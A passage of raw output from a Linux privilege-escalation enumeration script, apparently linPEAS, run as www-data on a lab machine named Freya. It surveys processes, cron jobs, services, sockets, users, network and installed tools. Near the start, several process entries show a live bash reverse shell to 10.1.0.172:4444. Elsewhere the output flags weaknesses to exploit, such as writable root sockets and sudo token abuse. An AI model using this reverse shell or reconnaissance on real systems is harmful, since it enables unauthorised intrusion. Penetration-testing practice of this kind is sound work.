2363 (www-data) - sh -c bash -c "bash -i >& /dev/tcp/10.1.0.172/4444 0>&1" + └─ Has open files: + └─ pipe:[25265] + └─ /var/log/apache2/error.log +Process 2364 (www-data) - bash -c bash -i >& /dev/tcp/10.1.0.172/4444 0>&1 + └─ Has open files: + └─ pipe:[25265] + └─ /var/log/apache2/error.log +Process 2494 (www-data) - sh -c bash -c "bash -i >& /dev/tcp/10.1.0.172/4444 0>&1" + └─ Has open files: + └─ pipe:[26160] + └─ /var/log/apache2/error.log +Process 2495 (www-data) - bash -c bash -i >& /dev/tcp/10.1.0.172/4444 0>&1 + └─ Has open files: + └─ pipe:[26160] + └─ /var/log/apache2/error.log +Process 2626 (www-data) - sh -c bash -c "bash -i >& /dev/tcp/10.1.0.172/4444 0>&1" + └─ Has open files: + └─ pipe:[27471] + └─ /var/log/apache2/error.log +Process 2627 (www-data) - bash -c bash -i >& /dev/tcp/10.1.0.172/4444 0>&1 + └─ Has open files: + └─ pipe:[27471] + └─ /var/log/apache2/error.log +Process 2650 (www-data) - tee out.txt + └─ Has open files: + └─ pipe:[27658] + └─ /tmp/out.txt + +╔══════════╣ Processes with memory-mapped credential files (T1003.007) + +╔══════════╣ Processes whose PPID belongs to a different user (not root) (T1134.004) +╚ You will know if a user can somehow spawn processes as a different user + +╔══════════╣ Files opened by processes belonging to other users (T1083) +╚ This is usually empty because of the lack of privileges to read other user processes information + +╔══════════╣ Check for vulnerable cron jobs (T1053.003) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs +══╣ Cron jobs list (T1053.003) +/usr/bin/crontab +incrontab Not Found +-rw-r--r-- 1 root root     722 May  6 11:17 /etc/crontab + +/etc/cron.d: +total 20 +drwxr-xr-x  2 root root 4096 May  6 11:17 . +drwxr-xr-x 85 root root 4096 May  6 11:17 .. +-rw-r--r--  1 root root  102 May  6 11:17 .placeholder +-rw-r--r--  1 root root  712 May  6 11:17 php +-rw-r--r--  1 root root 2467 May  6 11:17 sendmail + +/etc/cron.daily: +total 44 +drwxr-xr-x  2 root root 4096 May  6 11:17 . +drwxr-xr-x 85 root root 4096 May  6 11:17 .. +-rw-r--r--  1 root root  102 May  6 11:17 .placeholder +-rwxr-xr-x  1 root root  539 May  6 11:17 apache2 +-rwxr-xr-x  1 root root 1474 May  6 11:17 apt-compat +-rwxr-xr-x  1 root root  355 May  6 11:17 bsdmainutils +-rwxr-xr-x  1 root root 1597 May  6 11:17 dpkg +-rwxr-xr-x  1 root root   89 May  6 11:17 logrotate +-rwxr-xr-x  1 root root 1065 May  6 11:17 man-db +-rwxr-xr-x  1 root root  249 May  6 11:17 passwd +-rwxr-xr-x  1 root root 3302 May  6 11:17 sendmail + +/etc/cron.hourly: +total 12 +drwxr-xr-x  2 root root 4096 May  6 11:17 . +drwxr-xr-x 85 root root 4096 May  6 11:17 .. +-rw-r--r--  1 root root  102 May  6 11:17 .placeholder + +/etc/cron.monthly: +total 12 +drwxr-xr-x  2 root root 4096 May  6 11:17 . +drwxr-xr-x 85 root root 4096 May  6 11:17 .. +-rw-r--r--  1 root root  102 May  6 11:17 .placeholder + +/etc/cron.weekly: +total 16 +drwxr-xr-x  2 root root 4096 May  6 11:17 . +drwxr-xr-x 85 root root 4096 May  6 11:17 .. +-rw-r--r--  1 root root  102 May  6 11:17 .placeholder +-rwxr-xr-x  1 root root  723 May  6 11:17 man-db + +SHELL=/bin/sh +PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin + +17 * * * * root cd / && run-parts --report /etc/cron.hourly +25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) +47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) +52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) +/etc/crontab:8:PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin +/etc/crontab:11:17 * * * * root cd / && run-parts --report /etc/cron.hourly +/etc/crontab:12:25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) +/etc/crontab:13:47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) +/etc/crontab:14:52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) + +══╣ Cron files with hidden carriage returns (T1053.003) + +══╣ Checking for specific cron jobs vulnerabilities (T1053.003) +Checking cron directories... +══╣ run-parts executable entries (T1053.003) +[/etc/cron.hourly] +[/etc/cron.daily] +/etc/cron.daily/apache2 +/etc/cron.daily/apt-compat +/etc/cron.daily/bsdmainutils +/etc/cron.daily/dpkg +/etc/cron.daily/logrotate +/etc/cron.daily/man-db +/etc/cron.daily/passwd +/etc/cron.daily/sendmail +[/etc/cron.weekly] +/etc/cron.weekly/man-db +[/etc/cron.monthly] + + +╔══════════╣ System timers (T1053.003) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#timers +══╣ Active timers: (T1053.003) +NEXT LEFT LAST PASSED UNIT ACTIVATES +Fri 2026-05-08 15:39:00 CEST 6min left Fri 2026-05-08 15:09:01 CEST 23min ago phpsessionclean.timer phpsessionclean.service +Fri 2026-05-08 22:01:04 CEST 6h left Fri 2026-05-08 13:29:47 CEST 2h 2min ago apt-daily.timer apt-daily.service +Sat 2026-05-09 06:19:36 CEST 14h left Fri 2026-05-08 13:29:47 CEST 2h 2min ago apt-daily-upgrade.timer apt-daily-upgrade.service +Sat 2026-05-09 13:44:22 CEST 22h left Fri 2026-05-08 13:44:22 CEST 1h 47min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service +══╣ Disabled timers: (T1053.003) +══╣ Additional timer files: (T1053.003) + +╔══════════╣ Services and Service Files (T1543.002,T1007) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#services + +══╣ Active services: (T1543.002,T1007) +apache2.service loaded active running The Apache HTTP Server +console-setup.service loaded active exited Set console font and keymap +cron.service loaded active running Regular background program processing daemon +dbus.service loaded active running D-Bus System Message Bus +getty@tty1.service loaded active running Getty on tty1 +herosshd.service loaded active running OpenBSD Secure Shell server +ifup@ens18.service loaded active exited ifup for ens18 + Potential issue in service file: /lib/systemd/system/ifup@.service + └─ RELATIVE_PATH: Could be executing some relative path\n +keyboard-setup.service loaded active exited Set the console keyboard layout +kmod-static-nodes.service loaded active exited Create list of required static device nodes for the current kernel +mariadb.service loaded active running MariaDB 10.1.45 database server + Potential issue in service file: /lib/systemd/system/mariadb.service + └─ RELATIVE_PATH: Could be executing some relative path\n +mgmtsshd.service loaded active running HeroLab Management OpenBSD Secure Shell server +networking.service loaded active exited Raise network interfaces + Potential issue in service file: /lib/systemd/system/networking.service + └─ RELATIVE_PATH: Could be executing some relative path\n +qemu-guest-agent.service loaded active running LSB: QEMU Guest Agent startup script +rsyslog.service loaded active running System Logging Service +sendmail.service loaded active running LSB: powerful, efficient, and scalable Mail Transport Agent +systemd-journal-flush.service loaded active exited Flush Journal to Persistent Storage +systemd-journald.service loaded active running Journal Service +systemd-logind.service loaded active running Login Service +systemd-modules-load.service loaded active exited Load Kernel Modules +systemd-random-seed.service loaded active exited Load/Save Random Seed +systemd-remount-fs.service loaded active exited Remount Root and Kernel File Systems + Potential issue in service: systemd-remount-fs.service + └─ UNSAFE_CMD: Uses potentially dangerous commands\n +systemd-sysctl.service loaded active exited Apply Kernel Variables +systemd-timesyncd.service loaded active running Network Time Synchronization +systemd-tmpfiles-setup-dev.service loaded active exited Create Static Device Nodes in /dev +systemd-tmpfiles-setup.service loaded active exited Create Volatile Files and Directories +systemd-udev-trigger.service loaded active exited udev Coldplug all Devices + Potential issue in service: systemd-udev-trigger.service + └─ UNSAFE_CMD: Uses potentially dangerous commands\n +systemd-udevd.service loaded active running udev Kernel Device Manager +systemd-update-utmp.service loaded active exited Update UTMP about System Boot/Shutdown +systemd-user-sessions.service loaded active exited Permit User Sessions +vsftpd.service loaded active running vsftpd FTP server +LOAD = Reflects whether the unit definition was properly loaded. +ACTIVE = The high-level unit activation state, i.e. generalization of SUB. +SUB = The low-level unit activation state, values depend on unit type. +30 loaded units listed. Pass --all to see loaded but inactive units, too. +To show all installed unit files use 'systemctl list-unit-files'. + +══╣ Disabled services: (T1543.002,T1007) +apache-htcacheclean.service disabled +apache-htcacheclean@.service disabled +apache2@.service disabled +console-getty.service disabled +dbus-org.freedesktop.network1.service disabled +dbus-org.freedesktop.resolve1.service disabled +debug-shell.service disabled +mariadb@.service disabled +serial-getty@.service disabled +sudo.service disabled + Potential issue in service: sudo.service + └─ UNSAFE_CMD: Uses potentially dangerous commands\n +systemd-networkd-wait-online.service disabled +systemd-networkd.service disabled +systemd-resolved.service disabled +13 unit files listed. + +══╣ Additional service files: (T1543.002,T1007) + Potential issue in service file: /etc/systemd/system/multi-user.target.wants/mariadb.service + └─ RELATIVE_PATH: Could be executing some relative path\n + Potential issue in service file: /etc/systemd/system/multi-user.target.wants/networking.service + └─ RELATIVE_PATH: Could be executing some relative path\n + Potential issue in service file: /etc/systemd/system/mysql.service + └─ RELATIVE_PATH: Could be executing some relative path\n + Potential issue in service file: /etc/systemd/system/mysqld.service + └─ RELATIVE_PATH: Could be executing some relative path\n + Potential issue in service file: /etc/systemd/system/network-online.target.wants/networking.service + └─ RELATIVE_PATH: Could be executing some relative path\n + Potential issue in service file: /lib/systemd/system/emergency.service + └─ RELATIVE_PATH: Could be executing some relative path\n + Potential issue in service file: /lib/systemd/system/ifup@.service + └─ RELATIVE_PATH: Could be executing some relative path\n +You can't write on systemd PATH + +╔══════════╣ Systemd Information (T1543.002) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#systemd-path---relative-paths +═╣ Systemd version and vulnerabilities? .............. ═╣ Services running as root? .....  +═╣ Running services with dangerous capabilities? ...  +═╣ Services with writable paths? . mariadb.service: Uses relative path 'sync' (from # ExecStartPre=sync) +mariadb.service: Uses relative path 'sysctl' (from # ExecStartPre=sysctl -q -w vm.drop_caches=3) +mariadb.service: Uses relative path 'numactl' (from # Change ExecStart=numactl --interleave=all /usr/sbin/mysqld......) + +╔══════════╣ Systemd PATH (T1543.002) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#systemd-path---relative-paths +PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin + +╔══════════╣ Analyzing .socket files (T1559) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sockets + +╔══════════╣ Unix Sockets Analysis (T1571,T1049) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sockets +/run/dbus/system_bus_socket + └─(Read Write (Weak Permissions: 666) ) + └─(Owned by root) + └─High risk: root-owned and writable Unix socket +/run/mysqld/mysqld.sock + └─(Read Write Execute (Weak Permissions: 777) ) +/run/sendmail/mta/smcontrol +/run/systemd/cgroups-agent +/run/systemd/fsck.progress +/run/systemd/journal/dev-log + └─(Read Write (Weak Permissions: 666) ) + └─(Owned by root) + └─High risk: root-owned and writable Unix socket +/run/systemd/journal/socket + └─(Read Write (Weak Permissions: 666) ) + └─(Owned by root) + └─High risk: root-owned and writable Unix socket +/run/systemd/journal/stdout + └─(Read Write (Weak Permissions: 666) ) + └─(Owned by root) + └─High risk: root-owned and writable Unix socket +/run/systemd/journal/syslog + └─(Read Write (Weak Permissions: 666) ) + └─(Owned by root) + └─High risk: root-owned and writable Unix socket +/run/systemd/notify + └─(Read Write Execute (Weak Permissions: 777) ) + └─(Owned by root) + └─High risk: root-owned and writable Unix socket +/run/systemd/private + └─(Read Write Execute (Weak Permissions: 777) ) + └─(Owned by root) + └─High risk: root-owned and writable Unix socket +/run/udev/control +/var/run/dbus/system_bus_socket + └─(Read Write (Weak Permissions: 666) ) + └─(Owned by root) + └─High risk: root-owned and writable Unix socket +/var/run/mysqld/mysqld.sock + └─(Read Write Execute (Weak Permissions: 777) ) +/var/run/sendmail/mta/smcontrol + +╔══════════╣ D-Bus Analysis (T1559.001) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#d-bus +NAME PID PROCESS USER CONNECTION UNIT SESSION DESCRIPTION +:1.0 1 systemd root :1.0 init.scope - - +:1.1 654 systemd-logind root :1.1 systemd-logind.service - - +:1.339 32596 busctl www-data :1.339 apache2.service - - +org.freedesktop.DBus 630 dbus-daemon[0m messagebus org.freedesktop.DBus dbus.service - - +org.freedesktop.hostname1 - - - (activatable) - - +org.freedesktop.locale1 - - - (activatable) - - +org.freedesktop.login1 654 systemd-logind root :1.1 systemd-logind.service - - +org.freedesktop.network1 - - - (activatable) - - +org.freedesktop.resolve1 - - - (activatable) - - +org.freedesktop.systemd1 1 systemd root :1.0 init.scope - - +org.freedesktop.timedate1 - - - (activatable) - - + +╔══════════╣ D-Bus Configuration Files (T1559.001) +Analyzing /etc/dbus-1/system.d/org.freedesktop.hostname1.conf: + └─(Allow rules in default context) + └─ + +Analyzing /etc/dbus-1/system.d/org.freedesktop.locale1.conf: + └─(Allow rules in default context) + └─ + +Analyzing /etc/dbus-1/system.d/org.freedesktop.login1.conf: + └─(Allow rules in default context) + └─ + └─(Allow rules in default context) + └─ + └─(Allow rules in default context) + └─ + +Analyzing /etc/dbus-1/system.d/org.freedesktop.systemd1.conf: + └─(Allow rules in default context) + └─ + +Activation definitions in /usr/share/dbus-1/services: +/usr/share/dbus-1/services/org.freedesktop.systemd1.service:9:Name=org.freedesktop.systemd1 +/usr/share/dbus-1/services/org.freedesktop.systemd1.service:10:Exec=Exec=/bin/false +/usr/share/dbus-1/services/org.freedesktop.systemd1.service:11:User=User=root +Activation definitions in /usr/share/dbus-1/system-services: +/usr/share/dbus-1/system-services/org.freedesktop.locale1.service:9:Name=org.freedesktop.locale1 +/usr/share/dbus-1/system-services/org.freedesktop.locale1.service:10:Exec=Exec=/lib/systemd/systemd-localed +/usr/share/dbus-1/system-services/org.freedesktop.locale1.service:11:User=User=root +/usr/share/dbus-1/system-services/org.freedesktop.hostname1.service:9:Name=org.freedesktop.hostname1 +/usr/share/dbus-1/system-services/org.freedesktop.hostname1.service:10:Exec=Exec=/lib/systemd/systemd-hostnamed +/usr/share/dbus-1/system-services/org.freedesktop.hostname1.service:11:User=User=root +/usr/share/dbus-1/system-services/org.freedesktop.login1.service:9:Name=org.freedesktop.login1 +/usr/share/dbus-1/system-services/org.freedesktop.login1.service:10:Exec=Exec=/bin/sh -c 'mkdir -p /run/systemd; exec /lib/systemd/systemd-logind' +/usr/share/dbus-1/system-services/org.freedesktop.login1.service:11:User=User=root +/usr/share/dbus-1/system-services/org.freedesktop.timedate1.service:9:Name=org.freedesktop.timedate1 +/usr/share/dbus-1/system-services/org.freedesktop.timedate1.service:10:Exec=Exec=/lib/systemd/systemd-timedated +/usr/share/dbus-1/system-services/org.freedesktop.timedate1.service:11:User=User=root +/usr/share/dbus-1/system-services/org.freedesktop.resolve1.service:9:Name=org.freedesktop.resolve1 +/usr/share/dbus-1/system-services/org.freedesktop.resolve1.service:10:Exec=Exec=/bin/false +/usr/share/dbus-1/system-services/org.freedesktop.resolve1.service:11:User=User=root +/usr/share/dbus-1/system-services/org.freedesktop.network1.service:9:Name=org.freedesktop.network1 +/usr/share/dbus-1/system-services/org.freedesktop.network1.service:10:Exec=Exec=/bin/false +/usr/share/dbus-1/system-services/org.freedesktop.network1.service:11:User=User=root +/usr/share/dbus-1/system-services/org.freedesktop.systemd1.service:9:Name=org.freedesktop.systemd1 +/usr/share/dbus-1/system-services/org.freedesktop.systemd1.service:10:Exec=Exec=/bin/false +/usr/share/dbus-1/system-services/org.freedesktop.systemd1.service:11:User=User=root + +══╣ D-Bus Session Bus Analysis (T1559.001) +(Access to session bus available) + + +╔══════════╣ Legacy r-commands (rsh/rlogin/rexec) and host-based trust (T1021.004) + +══╣ Listening r-services (TCP 512-514) (T1021.004) + +══╣ systemd units exposing r-services (T1021.004) +rlogin|rsh|rexec units Not Found + +══╣ inetd/xinetd configuration for r-services (T1021.004) +/etc/inetd.conf Not Found +/etc/xinetd.d Not Found + +══╣ Installed r-service server packages (T1021.004) + No related packages found via dpkg + +══╣ /etc/hosts.equiv and /etc/shosts.equiv (T1021.004) + +══╣ Per-user .rhosts files (T1021.004) +.rhosts Not Found + +══╣ PAM rhosts authentication (T1021.004) +/etc/pam.d/rlogin|rsh Not Found + +══╣ SSH HostbasedAuthentication (T1021.004) + HostbasedAuthentication no or not set + +══╣ Potential DNS control indicators (local) (T1021.004) + Not detected + +╔══════════╣ Crontab UI (root) misconfiguration checks (T1053.003) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs +crontab-ui Not Found +╔══════════╣ Deleted files still open (T1083) +╚ Open deleted files can hide tools and still consume disk space + +╔══════════╣ Deleted executables still running (T1083) +╚ A deleted /proc//exe may indicate tampering, cleanup, or a useful runtime-only binary + + + + ╔═════════════════════╗ +══════════════════════════════╣ Network Information ╠══════════════════════════════ + ╚═════════════════════╝ +╔══════════╣ Interfaces (T1016) +default 0.0.0.0 +loopback 127.0.0.0 +link-local 169.254.0.0 + +1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1 + link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 + inet 127.0.0.1/8 scope host lo + valid_lft forever preferred_lft forever + inet6 ::1/128 scope host + valid_lft forever preferred_lft forever +2: ens18: mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 + link/ether bc:24:11:59:66:de brd ff:ff:ff:ff:ff:ff + inet 10.2.66.5/24 brd 10.2.66.255 scope global ens18 + valid_lft forever preferred_lft forever + inet6 fe80::be24:11ff:fe59:66de/64 scope link + valid_lft forever preferred_lft forever +══╣ Routing & policy quick view (T1016) +default via 10.2.66.1 dev ens18 +10.2.66.0/24 dev ens18 proto kernel scope link src 10.2.66.5 +fe80::/64 dev ens18 proto kernel metric 256 pref medium + +0: from all lookup local +32766: from all lookup main +32767: from all lookup default +══╣ Virtual/overlay interfaces quick view (T1016) +1: lo: mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1 +2: ens18: mtu 1500 qdisc pfifo_fast state UP mode DEFAULT group default qlen 1000 +══╣ Network namespaces quick view (T1016) +══╣ Forwarding status (T1016) +net.ipv4.ip_forward = 0 +net.ipv6.conf.all.forwarding = 0 + +╔══════════╣ Hostname, hosts and DNS (T1016,T1018) +══╣ Hostname Information (T1016,T1018) +System hostname: Freya +FQDN: Freya + +══╣ Hosts File Information (T1016,T1018) +Contents of /etc/hosts: + 127.0.0.1 localhost + 127.0.1.1 Freya + ::1 localhost ip6-localhost ip6-loopback + ff02::1 ip6-allnodes + ff02::2 ip6-allrouters + +══╣ DNS Configuration (T1016,T1018) +DNS Servers (resolv.conf): + 10.2.5.1 + +Systemd-resolved configuration: + [Resolve] + +DNS Domain Information: +(none) + +DNS Cache Status (systemd-resolve): + DNS Servers: 10.2.5.1 + DNSSEC NTA: 10.in-addr.arpa + 16.172.in-addr.arpa + 168.192.in-addr.arpa + 17.172.in-addr.arpa + 18.172.in-addr.arpa + +╔══════════╣ Active Ports (T1049) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-ports +══╣ Active Ports (ss) (T1049) +tcp LISTEN 0 80 127.0.0.1:3306 *:* +tcp LISTEN 0 128 *:5355 *:* +tcp LISTEN 0 10 127.0.0.1:587 *:* +tcp LISTEN 0 128 *:22 *:* +tcp LISTEN 0 10 127.0.0.1:25 *:* +tcp LISTEN 0 128 *:65535 *:* +tcp LISTEN 0 128 :::5355 :::* +tcp LISTEN 0 128 :::80 :::* +tcp LISTEN 0 32 :::21 :::* +tcp LISTEN 0 128 :::22 :::* +tcp LISTEN 0 128 :::65535 :::* +══╣ Local-only listeners (loopback) (T1049) +tcp LISTEN 0 80 127.0.0.1:3306 *:* +tcp LISTEN 0 10 127.0.0.1:587 *:* +tcp LISTEN 0 10 127.0.0.1:25 *:* +══╣ Unique listener bind addresses (T1049) +* +127.0.0.1 +127.0.0.53%lo +:: +══╣ Potential local forwarders/relays (T1049) +www-data 647 0.0 0.1 13208 1076 ? S 15:32 0:00 sed -E s,socat|ssh|-L|-R|-D|ncat|nc,.[1;31;103m&.[0m,g + +╔══════════╣ Network Traffic Analysis Capabilities (T1040) + +══╣ Available Sniffing Tools (T1040) +No sniffing tools found + +══╣ Network Interfaces Sniffing Capabilities (T1040) +Interface lo (loopback): Not sniffable +Interface ens18: Not sniffable +No sniffable interfaces found + +══╣ Running sniffing/traffic reconstruction processes (T1040) + +╔══════════╣ Firewall Rules Analysis (T1016) + +══╣ Iptables Rules (T1016) +No permission to list iptables rules + +══╣ Nftables Rules (T1016) +nftables Not Found + +══╣ Firewalld Rules (T1016) +firewalld Not Found + +══╣ UFW Rules (T1016) +ufw Not Found + +══╣ Forwarding and rp_filter (T1016) +net.ipv4.ip_forward = 0 +net.ipv6.conf.all.forwarding = 0 +net.ipv4.conf.all.rp_filter = 0 + +╔══════════╣ Inetd/Xinetd Services Analysis (T1049) + +══╣ Inetd Services (T1049) +inetd Not Found + +══╣ Xinetd Services (T1049) +xinetd Not Found + +══╣ Running Inetd/Xinetd Services (T1049) + +Active Services (from ss): + +Running Service Processes: + +╔══════════╣ Internet Access? (T1016,T1590) +DNS is not accessible +Port 443 is not accessible +ICMP is not accessible +Port 80 is not accessible +Port 443 is not accessible with curl + +══╣ Proxy discovery (T1016,T1590) +╚ Checking common proxy env vars and apt proxy config + + + + ╔═══════════════════╗ +═══════════════════════════════╣ Users Information ╠═══════════════════════════════ + ╚═══════════════════╝ +╔══════════╣ My user (T1033) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#users +uid=33(www-data) gid=33(www-data) groups=33(www-data) + +╔══════════╣ PGP Keys and Related Files (T1552.004) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#pgp-keys +GPG: +GPG is installed, listing keys: + +NetPGP: +netpgpkeys Not Found + +PGP Related Files: + +╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d (T1548.003) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid + + +╔══════════╣ Checking sudo tokens (T1548.003) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#reusing-sudo-tokens +ptrace protection is disabled (0), so sudo tokens could be abused + +doas.conf Not Found + +╔══════════╣ Checking Pkexec and Polkit (T1548.003,T1548.004,T1068) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/index.html#pe---method-2 + +══╣ Polkit Binary (T1548.003,T1068) + +══╣ Polkit Policies (T1548.003) + +══╣ Polkit Authentication Agent (T1548.004) + +╔══════════╣ Superusers and UID 0 Users (T1087.001) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/index.html + +══╣ Users with UID 0 in /etc/passwd (T1087.001) +root:x:0:0:root:/root:/bin/bash + +══╣ Users with sudo privileges in sudoers (T1087.001) + +╔══════════╣ Users with console (T1087.001) +root:x:0:0:root:/root:/bin/bash +user:x:1000:1000:user,,,:/home/user:/bin/bash + +╔══════════╣ All users & groups (T1087.001,T1069.001) +uid=0(root) gid=0(root) groups=0(root) +uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m) +uid=10(uucp) gid=10(uucp) groups=10(uucp) +uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync) +uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev) +uid=1001(baldur) gid=1001(baldur) groups=1001(baldur) +uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network) +uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve) +uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy) +uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup) +uid=105(messagebus) gid=109(messagebus) groups=109(messagebus) +uid=106(sshd) gid=65534(nogroup) groups=65534(nogroup) +uid=107(mysql) gid=111(mysql) groups=111(mysql) +uid=108(ftp) gid=112(ftp) groups=112(ftp) +uid=109(smmta) gid=114(smmta) groups=114(smmta) +uid=110(smmsp) gid=115(smmsp) groups=115(smmsp) +uid=13(proxy) gid=13(proxy) groups=13(proxy) +uid=2(bin) gid=2(bin) groups=2(bin) +uid=3(sys) gid=3(sys) groups=3(sys) +uid=33(www-data) gid=33(www-data) groups=33(www-data) +uid=34(backup) gid=34(backup) groups=34(backup) +uid=38(list) gid=38(list) groups=38(list) +uid=39(irc) gid=39(irc) groups=39(irc) +uid=4(sync) gid=65534(nogroup) groups=65534(nogroup) +uid=41(gnats) gid=41(gnats) groups=41(gnats) +uid=5(games) gid=60(games) groups=60(games) +uid=6(man) gid=12(man) groups=12(man) +uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) +uid=7(lp) gid=7(lp) groups=7(lp) +uid=8(mail) gid=8(mail) groups=8(mail) +uid=9(news) gid=9(news) groups=9(news) + +╔══════════╣ Currently Logged in Users (T1033) + +══╣ Basic user information (T1033) + 15:32:33 up 2:03, 0 users, load average: 0.54, 0.18, 0.06 +USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT + +══╣ Active sessions (T1033) + 15:32:33 up 2:03, 0 users, load average: 0.54, 0.18, 0.06 +USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT + +══╣ Logged in users (utmp) (T1033) + system boot May 8 13:29 +LOGIN tty1 May 8 13:29 674 id=tty1 + run-level 5 May 8 13:32 + +══╣ SSH sessions (T1033) + +══╣ Screen sessions (T1033) + +══╣ Tmux sessions (T1033) + +╔══════════╣ Last Logons and Login History (T1033) + +══╣ Last logins (T1033) +reboot system boot 4.9.0-13-amd64 Fri May 8 13:29 still running + +wtmp begins Fri May 8 13:29:35 2026 + +══╣ Failed login attempts (T1033) + +══╣ Recent logins from auth.log (limit 20) (T1033) + +══╣ Last time logon each user (T1033) +Username Port From Latest + +╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...) + +╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!! + +╔══════════╣ Actual Group Memberships via newgrp (T1069.001) + + + + ╔══════════════════════╗ +═════════════════════════════╣ Software Information ╠═════════════════════════════ + ╚══════════════════════╝ +╔══════════╣ Useful software (T1082) +/usr/bin/base64 +/usr/bin/curl +/usr/bin/make +/bin/nc +/bin/nc.traditional +/bin/netcat +/usr/bin/perl +/usr/bin/php +/bin/ping +/usr/bin/python +/usr/bin/python2 +/usr/bin/python2.7 +/usr/bin/python3 +/usr/bin/socat +/usr/bin/sudo +/usr/bin/wget + +╔══════════╣ Installed Compilers (T1587.001) + +╔══════════╣ Analyzing Apache-Nginx Files (limit 70) +Apache version: Server version: Apache/2.4.25 (Debian) +Server built: 2019-10-13T15:43:54 +httpd Not Found + +Nginx version: nginx Not Found + +/etc/apache2/mods-enabled/php7.0.conf- +/etc/apache2/mods-enabled/php7.0.conf: SetHandler application/x-httpd-php +-- +/etc/apache2/mods-enabled/php7.0.conf- +/etc/apache2/mods-enabled/php7.0.conf: SetHandler application/x-httpd-php-source +-- +/etc/apache2/mods-available/php7.0.conf- +/etc/apache2/mods-available/php7.0.conf: SetHandler application/x-httpd-php +-- +/etc/apache2/mods-available/php7.0.conf- +/etc/apache2/mods-available/php7.0.conf: SetHandler application/x-httpd-php-source +══╣ PHP exec extensions +drwxr-xr-x 2 root root 4096 May 6 11:17 /etc/apache2/sites-enabled +drwxr-xr-x 2 root root 4096 May 6 11:17 /etc/apache2/sites-enabled +-rw-r--r-- 1 root root 1327 May 6 11:17 /etc/apache2/sites-enabled/000-default.conf + + ServerAdmin webmaster@localhost + DocumentRoot /var/www + ErrorLog ${APACHE_LOG_DIR}/error.log + CustomLog ${APACHE_LOG_DIR}/access.log combined + + + +-rw-r--r-- 1 root root 1332 May 6 11:17 /etc/apache2/sites-available/000-default.conf + + ServerAdmin webmaster@localhost + DocumentRoot /var/www/html + ErrorLog ${APACHE_LOG_DIR}/error.log + CustomLog ${APACHE_LOG_DIR}/access.log combined + +-rw-r--r-- 1 root root 1327 May 6 11:17 /etc/apache2/sites-enabled/000-default.conf + + ServerAdmin webmaster@localhost + DocumentRoot /var/www + ErrorLog ${APACHE_LOG_DIR}/error.log + CustomLog ${APACHE_LOG_DIR}/access.log combined + + +-rw-r--r-- 1 root root 71537 May 6 11:17 /etc/php/7.0/apache2/php.ini +allow_url_fopen = On +allow_url_include = Off +odbc.allow_persistent = On +ibase.allow_persistent = 1 +mysqli.allow_persistent = On +pgsql.allow_persistent = On +-rw-r--r-- 1 root root 71194 May 6 11:17 /etc/php/7.0/cli/php.ini +allow_url_fopen = On +allow_url_include = Off +odbc.allow_persistent = On +ibase.allow_persistent = 1 +mysqli.allow_persistent = On +pgsql.allow_persistent = On + + + +╔══════════╣ Browser Profiles (T1539,T1217) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#browser-data + +╔══════════╣ Analyzing MariaDB Files (limit 70) +-rw-r--r-- 1 root root 869 May 6 11:17 /etc/mysql/mariadb.cnf +[client-server] +!includedir /etc/mysql/conf.d/ +!includedir /etc/mysql/mariadb.conf.d/ + +-rw------- 1 root root 277 May 6 11:17 /etc/mysql/debian.cnf + +╔══════════╣ Analyzing Wordpress Files (limit 70) +-rw-r--r-- 1 root root 2381 May 6 11:17 